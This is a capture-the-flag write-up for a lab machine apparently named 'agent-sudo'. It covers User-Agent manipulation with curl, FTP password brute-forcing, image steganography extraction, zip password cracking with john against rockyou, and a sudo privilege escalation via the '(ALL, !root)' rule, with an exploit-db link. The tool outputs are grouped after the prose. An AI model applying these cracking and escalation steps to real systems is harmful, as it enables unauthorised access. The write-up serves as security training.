which shows ftp on port 21, ssh on port 22, and a webserver on port 80.
Accessing the website shows a message from Agent R, indicating that the User-Agent must be manipulated to access the site.
Setting the User-Agent: R via curl yields the following,
$ curl -A "R" 10.10.94.61
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>
<html>
<head>
<title>Annoucement</title>
</head>
<body>
<p>
Dear agents,
<br><br>
Use your own <b>codename</b> as user-agent to access the site.
<br><br>
From,<br>
Agent R
</p>
</body>
</html>
which indicates all letters of the alphabet are used as identifiers for the different agents.
Iterating through the alphabet, one will find the name of the agent being asked for.
Hash cracking and brute-force
Anonymous FTP login was not possible, and guessing the intended username for the FTP service is possible from the enumeration part, hence the password must be brute-forced. In this case, hydra was used like so:
Ultimately, this yields a password that can be used to login at the FTP service, and thereby list the following files:
To download all those files to analyze them locally, the following can be used:
Moving on with binwalk to find embedded files and extracting those:
Extracting the zip archive:
The zip archive turns out to be password-protected. Here zip2john can be used:
The file john.txt is then passed on to john, yielding the password:
This allows us to unzip the archive, and we can then read To_agentR.txt. Utilizing https://gchq.github.io/CyberChef/ and its Magic functionality proposes what turns out to be the password needed for extracting the embedded content in the other image file, cute-alien.jpg.
For this, steghide can be used. First we try to get information on embedded data:
It turns out that cute-alien.jpg contains a message.txt file. This is then extracted:
From the content of message.txt, we can derive the full name of the other agent and the SSH password.
Capture the user flag
Upon logging in via SSH, a file user_flag.txt is found together with an image file, Alien_autopsy.jpg. Some googling should get you the answer to the incident question.
Privilege escalation
So, the name of the CTF kind of hints at the attack vector already. Nevertheless, it is always nice to see what can be executed as root to begin with:
If we then see what version of sudo is running on the machine:
Then we rather quickly find that the exploit found here https://www.exploit-db.com/exploits/47502 is suitable, and works perfectly fine to obtain root and answer the remaining questions.
$ ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Oct 29 2019 .
drwxr-xr-x 2 0 0 4096 Oct 29 2019 ..
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
wget -m ftp://<username>:<password>@<ip>
$ binwalk cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
$ binwalk -e cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
$ zip2john 8702.zip > john.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt john.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<password> (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2024-02-10 18:27) 3.703g/s 91022p/s 91022c/s 91022C/s christal..280789
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ steghide info cute-alien.jpg
"cute-alien.jpg":
format: jpeg
capacity: 1,8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "message.txt":
size: 181,0 Byte
encrypted: rijndael-128, cbc
compressed: yes
$ steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
$ <username>@agent-sudo:~$ sudo -l
[sudo] password for <username>:
Matching Defaults entries for <username> on agent-sudo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User <username> may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2